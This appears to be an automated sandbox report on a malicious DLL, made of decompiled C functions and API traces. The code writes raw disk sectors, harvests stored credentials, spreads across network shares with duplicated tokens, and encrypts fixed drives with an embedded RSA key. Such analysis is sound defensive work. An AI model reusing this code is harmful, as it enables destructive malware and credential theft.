				if(_t26 >= _a8 + _t57 + _t46 + 0x481c) {
					_t28 = HeapAlloc(GetProcessHeap(), 8, _t26); // executed
					_t44 = _a28;
					_t52 = _t28;
					 *_t44 = _t28;
					if(memcpy(_t52, _a12, _t57) == 0) {
						L12:
						_t30 = 0;
						L13:
						return _t30;
					}
					_t54 = _t52 + _t57;
					if(memcpy(_t54, _a44, _a48 + _a48) == 0) {
						goto L12;
					}
					_t55 = _t54 + 0x100;
					if(memcpy(_t55, _a36, _a40 + _a40) == 0) {
						goto L12;
					}
					_t37 = _a8;
					 *(_t55 + 0x4718) = _t37;
					if(memcpy(_t55 + 0x471c, _a4, _t37) == 0 || memcpy( *_t44 + _t57 + 0x76fc2, _a20, _a24) == 0) {
						goto L12;
					} else {
						_t30 = 1;
						goto L13;
					}
				} else {
					return 0;
				}
			}













    0x011e1f7e
    0x011e1f85
    0x011e1f88
    0x011e1f8f
    0x011e1f91
    0x011e1f93
    0x011e1f93
    0x011e1fa1
    0x011e1fa3
    0x011e1fa3
    0x011e1fb8
    0x011e1fcd
    0x011e1fd3
    0x011e1fda
    0x011e1fdd
    0x011e1fe9
    0x011e205f
    0x011e205f
    0x011e2061
    0x00000000
    0x011e2062
    0x011e1ff4
    0x011e2001
    0x00000000
    0x00000000
    0x011e200c
    0x011e201d
    0x00000000
    0x00000000
    0x011e201f
    0x011e2026
    0x011e203d
    0x00000000
    0x011e205b
    0x011e205b
    0x00000000
    0x011e205b
    0x011e1fba
    0x00000000
    0x011e1fba

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E12D5, Relevance: 10.6, APIs: 7, Instructions: 70
    C-Code - Quality: 95%
    			E011E12D5(void* __ecx, CHAR* _a4, void* _a8) {
				long _v8;
				int _t10;
				signed int _t11;
				signed int _t13;
				int _t16;
				signed int _t17;
				void* _t20;
				signed int _t28;

				_t28 = 0;
				_v8 = 0;
				if(_a4 != 0) {
					memset(_a8, 0, 0x200);
					_t20 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
					if(_t20 != 0xffffffff) {
						_push(0);
						_t10 = SetFilePointerEx(_t20, 0, 0, 0); // executed
						if(_t10 == 0) {
							L8:
							_t11 = GetLastError();
							if(_t11 > _t28) {
								_t11 = _t11 & 0x0000ffff | 0x80070000;
							}
							_t28 = _t11;
						} else {
							_t16 = ReadFile(_t20, _a8, 0x200,  &_v8, 0); // executed
							if(_t16 == 0) {
								goto L8;
							}
						}
						CloseHandle(_t20);
					} else {
						_t17 = GetLastError();
						if(_t17 > 0) {
							_t17 = _t17 & 0x0000ffff | 0x80070000;
						}
						_t28 = _t17;
					}
					_t13 = _t28;
				} else {
					_t13 = 0x80070057;
				}
				return _t13;
			}











    0x011e12dc
    0x011e12df
    0x011e12e5
    0x011e12fb
    0x011e1318
    0x011e131d
    0x011e1337
    0x011e1340
    0x011e1348
    0x011e135e
    0x011e135e
    0x011e1366
    0x011e136d
    0x011e136d
    0x011e1372
    0x011e134a
    0x011e1354
    0x011e135c
    0x00000000
    0x00000000
    0x011e135c
    0x011e1375
    0x011e131f
    0x011e131f
    0x011e1327
    0x011e132e
    0x011e132e
    0x011e1333
    0x011e1333
    0x011e137b
    0x011e12e7
    0x011e12e7
    0x011e12e7
    0x011e1381

    APIs
    • memset.MSVCRT ref: 011E12FB
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E1312
    • GetLastError.KERNEL32 ref: 011E131F
    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011E1340
    • ReadFile.KERNEL32(00000000,00000200,00000200,00000000,00000000), ref: 011E1354
    • GetLastError.KERNEL32 ref: 011E135E
    • CloseHandle.KERNEL32(00000000), ref: 011E1375
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7A17, Relevance: 9.1, APIs: 6, Instructions: 103
    C-Code - Quality: 100%
    			E011E7A17(intOrPtr _a4, int _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* __esi;
				int _t36;
				int _t42;
				short* _t47;
				signed int _t55;
				signed int _t56;
				signed int _t58;
				intOrPtr* _t61;
				void* _t63;
				signed int _t66;
				void* _t67;

				_v12 = _v12 | 0xffffffff;
				_v16 = 0;
				_v8 = 0x4000;
				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
				if(_t36 == 0) {
					_t63 = GlobalAlloc(0x40, _v8);
					_v24 = _t63;
					if(_t63 != 0) {
						_v16 = 1;
						while(1) {
							memset(_t63, 0, _v8);
							_t67 = _t67 + 0xc;
							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8);
							if(_t42 != 0) {
								break;
							}
							_a8 = 0;
							if(_v12 > 0) {
								_t16 = _t63 + 0x14; // 0x14
								_t61 = _t16;
								do {
									_t55 = 2;
									if(( *(_t61 - 8) & _t55) != _t55) {
										_t47 =  *_t61;
										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
											_t56 =  *(_t47 + 4) & 0x0000ffff;
											if(_t56 != 0) {
												_t66 = _t56;
												while(_t66 != 0x5c) {
													_t55 = _t55 + 1;
													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
													_t66 = _t58;
													if(_t58 != 0) {
														continue;
													}
													goto L15;
												}
											}
											L15:
											 *(_t47 + _t55 * 2) = 0;
											E011E6FC7( *_t61 + 4, 0, _a4);
											_t63 = _v24;
										}
									} else {
										_t18 = _t61 - 0x14; // 0x0
										E011E7A17(_a4, _t18);
									}
									_a8 = _a8 + 1;
									_t61 = _t61 + 0x20;
								} while (_a8 < _v12);
							}
						}
						if(_t42 != 0x103) {
							_v16 = 0;
						}
						GlobalFree(_t63);
						WNetCloseEnum(_v20);
					}
				}
				return _v16;
			}



















    0x011e7a1d
    0x011e7a32
    0x011e7a35
    0x011e7a3c
    0x011e7a44
    0x011e7a56
    0x011e7a58
    0x011e7a5d
    0x011e7a63
    0x011e7a66
    0x011e7a6b
    0x011e7a70
    0x011e7a7f
    0x011e7a87
    0x00000000
    0x00000000
    0x011e7a8d
    0x011e7a93
    0x011e7a95
    0x011e7a95
    0x011e7a98
    0x011e7a9d
    0x011e7aa2
    0x011e7ab2
    0x011e7ab6
    0x011e7ac5
    0x011e7acc
    0x011e7ace
    0x011e7ad0
    0x011e7ad6
    0x011e7ad7
    0x011e7adb
    0x011e7ae0
    0x00000000
    0x00000000
    0x00000000
    0x011e7ae0
    0x011e7ad0
    0x011e7ae2
    0x011e7ae7
    0x011e7af2
    0x011e7af7
    0x011e7af7
    0x011e7aa4
    0x011e7aa4
    0x011e7aab
    0x011e7aab
    0x011e7afa
    0x011e7b00
    0x011e7b03
    0x011e7b08
    0x011e7a93
    0x011e7b12
    0x011e7b14
    0x011e7b14
    0x011e7b18
    0x011e7b21
    0x011e7b21
    0x011e7b27
    0x011e7b2e

    APIs
    • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 011E7A3C
    • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 011E7A50
    • memset.MSVCRT ref: 011E7A6B
    • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 011E7A7F
    • GlobalFree.KERNEL32(00000000), ref: 011E7B18
    • WNetCloseEnum.MPR(0000FFFF), ref: 011E7B21
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1384, Relevance: 9.1, APIs: 6, Instructions: 64
    C-Code - Quality: 95%
    			E011E1384(signed int __eax, void* __ecx, CHAR* _a4, void* _a8) {
				long _v8;
				int _t9;
				signed int _t10;
				signed int _t12;
				int _t15;
				signed int _t16;
				void* _t19;
				signed int _t23;
				signed int _t26;

				_t23 = 0;
				_t26 = __eax;
				_v8 = 0;
				if(_a4 != 0) {
					_t19 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0, 0);
					if(_t19 != 0xffffffff) {
						_push(0);
						_t9 = SetFilePointerEx(_t19, _t26 << 9, 0, 0); // executed
						if(_t9 == 0) {
							L8:
							_t10 = GetLastError();
							if(_t10 > _t23) {
								_t10 = _t10 & 0x0000ffff | 0x80070000;
							}
							_t23 = _t10;
						} else {
							_t15 = WriteFile(_t19, _a8, 0x200,  &_v8, 0); // executed
							if(_t15 == 0) {
								goto L8;
							}
						}
						CloseHandle(_t19);
					} else {
						_t16 = GetLastError();
						if(_t16 > 0) {
							_t16 = _t16 & 0x0000ffff | 0x80070000;
						}
						_t23 = _t16;
					}
					_t12 = _t23;
				} else {
					_t12 = 0x80070057;
				}
				return _t12;
			}












    0x011e138b
    0x011e138d
    0x011e138f
    0x011e1395
    0x011e13b3
    0x011e13b8
    0x011e13d2
    0x011e13dc
    0x011e13e4
    0x011e13fe
    0x011e13fe
    0x011e1406
    0x011e140d
    0x011e140d
    0x011e1412
    0x011e13e6
    0x011e13f4
    0x011e13fc
    0x00000000
    0x00000000
    0x011e13fc
    0x011e1415
    0x011e13ba
    0x011e13ba
    0x011e13c2
    0x011e13c9
    0x011e13c9
    0x011e13ce
    0x011e13ce
    0x011e141b
    0x011e1397
    0x011e1397
    0x011e1397
    0x011e1421

    APIs
    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 011E13AD
    • GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13BA
    • SetFilePointerEx.KERNEL32(00000000,00000020,00000000,00000000,00000000), ref: 011E13DC
    • WriteFile.KERNEL32(00000000,011E1852,00000200,00000000,00000000), ref: 011E13F4
    • GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13FE
    • CloseHandle.KERNEL32(00000000), ref: 011E1415
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8E04, Relevance: 9.1, APIs: 6, Instructions: 52
    C-Code - Quality: 58%
    			E011E8E04(void* __ecx, void* _a4) {
				void _v8;
				intOrPtr _v12;
				void* __esi;
				intOrPtr _t10;
				void* _t14;
				void _t21;
				void* _t24;
				intOrPtr* _t28;
				void* _t30;

				_t30 = _a4;
				_t21 =  *_t30;
				_t10 =  *((intOrPtr*)(_t30 + 4));
				_v8 = _t21;
				_v12 = _t10;
				if(_t21 >= _t10) {
					L6:
					LocalFree(_t30);
					return 0;
				}
				_t28 = __imp__#14;
				do {
					_t14 = E011EA3D9( *_t28(_t21)); // executed
					if(_t14 != 0) {
						__imp__#12( *_t28(_t21));
						_t24 = E011E6916(_t15);
						if(_t24 != 0) {
							E011E6FC7(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
							HeapFree(GetProcessHeap(), 0, _t24);
							_t30 = _a4;
						}
					}
					_t21 = _v8 + 1;
					_v8 = _t21;
				} while (_t21 < _v12);
				goto L6;
			}












    0x011e8e0b
    0x011e8e0e
    0x011e8e10
    0x011e8e14
    0x011e8e17
    0x011e8e1c
    0x011e8e6f
    0x011e8e70
    0x011e8e7c
    0x011e8e7c
    0x011e8e1e
    0x011e8e24
    0x011e8e28
    0x011e8e2f
    0x011e8e35
    0x011e8e41
    0x011e8e45
    0x011e8e4c
    0x011e8e5a
    0x011e8e60
    0x011e8e60
    0x011e8e45
    0x011e8e66
    0x011e8e67
    0x011e8e6a
    0x00000000

    APIs
    • htonl.WS2_32 ref: 011E8E25
    • htonl.WS2_32 ref: 011E8E32
    • inet_ntoa.WS2_32(00000000), ref: 011E8E35
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 011E8E53
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 011E8E5A
    • LocalFree.KERNEL32(?), ref: 011E8E70
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1EEF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
    C-Code - Quality: 100%
    			E011E1EEF(void* __ecx) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				signed int _t14;
				void* _t17;
				short _t19;
				short _t20;
				signed int _t24;
				signed int _t31;

				_t14 = GetLogicalDrives();
				_t24 = _t14;
				_t31 = 0x1f;
				do {
					_t17 = 1 << _t31;
					if((_t24 & 1) != 0) {
						_t3 = _t31 + 0x41; // 0x60
						_v12 = _t3;
						_t19 = 0x3a;
						_v10 = _t19;
						_t20 = 0x5c;
						_v8 = _t20;
						_v6 = 0;
						_t17 = GetDriveTypeW( &_v12);
						if(_t17 == 3) {
							_t17 = LocalAlloc(0x40, 0x20);
							if(_t17 != 0) {
								 *(_t17 + 0x10) = L"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB";
								 *((intOrPtr*)(_t17 + 0x1c)) = 0;
								 *_t17 = _v12;
								 *((intOrPtr*)(_t17 + 4)) = _v8;
								_t17 = CreateThread(0, 0, E011E1E51, _t17, 0, 0); // executed
							}
						}
					}
					_t31 = _t31 - 1;
				} while (_t31 >= 0);
				return _t17;
			}













    0x011e1ef7
    0x011e1eff
    0x011e1f01
    0x011e1f04
    0x011e1f09
    0x011e1f0d
    0x011e1f11
    0x011e1f14
    0x011e1f18
    0x011e1f19
    0x011e1f1f
    0x011e1f20
    0x011e1f26
    0x011e1f2e
    0x011e1f37
    0x011e1f3d
    0x011e1f45
    0x011e1f4a
    0x011e1f51
    0x011e1f5c
    0x011e1f63
    0x011e1f66
    0x011e1f66
    0x011e1f45
    0x011e1f37
    0x011e1f6c
    0x011e1f6c
    0x011e1f73

    APIs
    • GetLogicalDrives.KERNEL32 ref: 011E1EF7
    • GetDriveTypeW.KERNELBASE(?,?,?,?,011E808B), ref: 011E1F2E
    • LocalAlloc.KERNEL32(00000040,00000020,?,?,?,011E808B), ref: 011E1F3D
    • CreateThread.KERNEL32(00000000,00000000,011E1E51,00000000,00000000,00000000), ref: 011E1F66
    Strings
    • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 011E1F4A
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7C10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51
    C-Code - Quality: 80%
    			E011E7C10() {
				char _v8;
				char _v528;
				char* _t10;
				void* _t18;
				void* _t21;

				_t18 =  *0x11ff140; // 0x2e8160
				E011E6FC7(L"127.0.0.1", 1);
				E011E6FC7(L"localhost", 1, _t18);
				_t10 =  &_v528;
				_v8 = 0x104;
				__imp__GetComputerNameExW(4, _t10,  &_v8);
				if(_t10 != 0) {
					E011E6FC7( &_v528, 1, _t18);
				}
				CreateThread(0, 0, E011E8E7F, _t18, 0, 0); // executed
				_t21 = 0;
				L3:
				E011E777B(_t18); // executed
				E011E786B(_t18); // executed
				if(_t21 == 0) {
					E011E795A(_t18, 0x80000000, 0); // executed
					_t21 = 1;
				}
				Sleep(0x2bf20); // executed
				goto L3;
			}








    0x011e7c1c
    0x011e7c2b
    0x011e7c36
    0x011e7c3f
    0x011e7c48
    0x011e7c4f
    0x011e7c57
    0x011e7c60
    0x011e7c60
    0x011e7c71
    0x011e7c77
    0x011e7c79
    0x011e7c7a
    0x011e7c80
    0x011e7c87
    0x011e7c90
    0x011e7c97
    0x011e7c97
    0x011e7c9d
    0x00000000

    APIs
    • GetComputerNameExW.KERNEL32(00000004,?,?,002E8160,002E8160), ref: 011E7C4F
    • CreateThread.KERNEL32(00000000,00000000,Function_00008E7F,002E8160,00000000,00000000), ref: 011E7C71
      • Part of subcall function 011E777B: LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 011E7789
      • Part of subcall function 011E777B: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8160,00000000), ref: 011E77A2
      • Part of subcall function 011E777B: GetProcessHeap.KERNEL32(00000008,00100000), ref: 011E77BD
      • Part of subcall function 011E777B: RtlAllocateHeap.NTDLL(00000000), ref: 011E77C4
      • Part of subcall function 011E777B: wsprintfW.USER32 ref: 011E781B
      • Part of subcall function 011E777B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7844
      • Part of subcall function 011E777B: HeapFree.KERNEL32(00000000), ref: 011E784B
      • Part of subcall function 011E777B: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011E7C7F), ref: 011E7853
      • Part of subcall function 011E777B: FreeLibrary.KERNEL32(002E8160), ref: 011E785C
      • Part of subcall function 011E786B: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E7887
      • Part of subcall function 011E786B: GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 011E78A5
      • Part of subcall function 011E786B: HeapAlloc.KERNEL32(00000000), ref: 011E78AC
      • Part of subcall function 011E786B: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E78C5
      • Part of subcall function 011E786B: wsprintfW.USER32 ref: 011E7917
      • Part of subcall function 011E786B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7943
      • Part of subcall function 011E786B: HeapFree.KERNEL32(00000000), ref: 011E794A
    • Sleep.KERNELBASE(0002BF20,002E8160,002E8160), ref: 011E7C9D
      • Part of subcall function 011E795A: NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8160,?,002E8160,?,002E8160,00000000,002E8160), ref: 011E798B
      • Part of subcall function 011E795A: NetApiBufferFree.NETAPI32(?), ref: 011E7A08
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9F8E, Relevance: 7.6, APIs: 5, Instructions: 88
    C-Code - Quality: 44%
    			E011E9F8E() {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				short _v48;
				void* __esi;
				int _t21;
				intOrPtr _t22;
				void* _t33;
				char* _t46;

				_v8 = 0;
				_v12 = 0;
				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v8);
				_t48 = _t21;
				if(_t21 != 0) {
					DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v12);
				}
				_t22 =  *0x11ff140; // 0x2e8160
				_v16 = _t22;
				_t46 = E011E7091(0x24, E011E6EDA, 0, 0xffff);
				E011E7A17(_t46, 0); // executed
				E011E7B31(_t46);
				E011E70FA(_t46);
				_t43 = _t46;
				_t42 = E011E6F40(_t46, _t48,  &_v48);
				if(_t28 != 0) {
					do {
						_t33 = E011E9987( &_v48, 0, 0, 0); // executed
						if(_t33 != 0) {
							E011E6F91( &_v48, _t46, _t42);
							_t43 =  &_v48;
							E011E6F91( &_v48, _v16, 0);
						}
						_v48 = 0;
					} while (E011E6F02(_t43,  &_v48) != 0);
					E011E6F78(_t42);
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = 0;
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
				}
				return 0;
			}












    0x011e9fa1
    0x011e9fa4
    0x011e9fae
    0x011e9fb4
    0x011e9fb6
    0x011e9fc9
    0x011e9fc9
    0x011e9fcf
    0x011e9fe1
    0x011e9fe9
    0x011e9fed
    0x011e9ff3
    0x011e9ff8
    0x011ea001
    0x011ea008
    0x011ea00c
    0x011ea00e
    0x011ea015
    0x011ea01c
    0x011ea023
    0x011ea02c
    0x011ea02f
    0x011ea02f
    0x011ea036
    0x011ea043
    0x011ea048
    0x011ea048
    0x011ea056
    0x011ea05b
    0x011ea05d
    0x011ea05d
    0x011ea063
    0x011ea068
    0x011ea068
    0x011ea070

    APIs
    • GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 011E9FA7
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E9FAE
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E9FC9
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
      • Part of subcall function 011E7091: InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
      • Part of subcall function 011E7A17: WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 011E7A3C
      • Part of subcall function 011E7A17: GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 011E7A50
      • Part of subcall function 011E7A17: memset.MSVCRT ref: 011E7A6B
      • Part of subcall function 011E7A17: WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 011E7A7F
      • Part of subcall function 011E7A17: GlobalFree.KERNEL32(00000000), ref: 011E7B18
      • Part of subcall function 011E7A17: WNetCloseEnum.MPR(0000FFFF), ref: 011E7B21
      • Part of subcall function 011E7B31: CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 011E7B4A
      • Part of subcall function 011E7B31: CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 011E7C02
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • CloseHandle.KERNEL32(?), ref: 011EA068
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A2A
      • Part of subcall function 011E9987: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A6A
      • Part of subcall function 011E9987: PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E9987: GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
      • Part of subcall function 011E9987: GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
      • Part of subcall function 011E9987: OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
      • Part of subcall function 011E9987: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
      • Part of subcall function 011E9987: memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E9987: CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
      • Part of subcall function 011E9987: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
      • Part of subcall function 011E9987: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
      • Part of subcall function 011E9987: GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CB5
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CC1
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CCD
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CD9
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CE5
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9D2B
      • Part of subcall function 011E9987: DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D62
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D76
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E9987: SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
    • CloseHandle.KERNEL32(?), ref: 011EA05B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E122D, Relevance: 7.6, APIs: 5, Instructions: 59
    C-Code - Quality: 100%
    			E011E122D(CHAR* _a4, intOrPtr* _a8) {
				long _v8;
				void _v156;
				void* _t8;
				int _t11;
				signed int _t15;
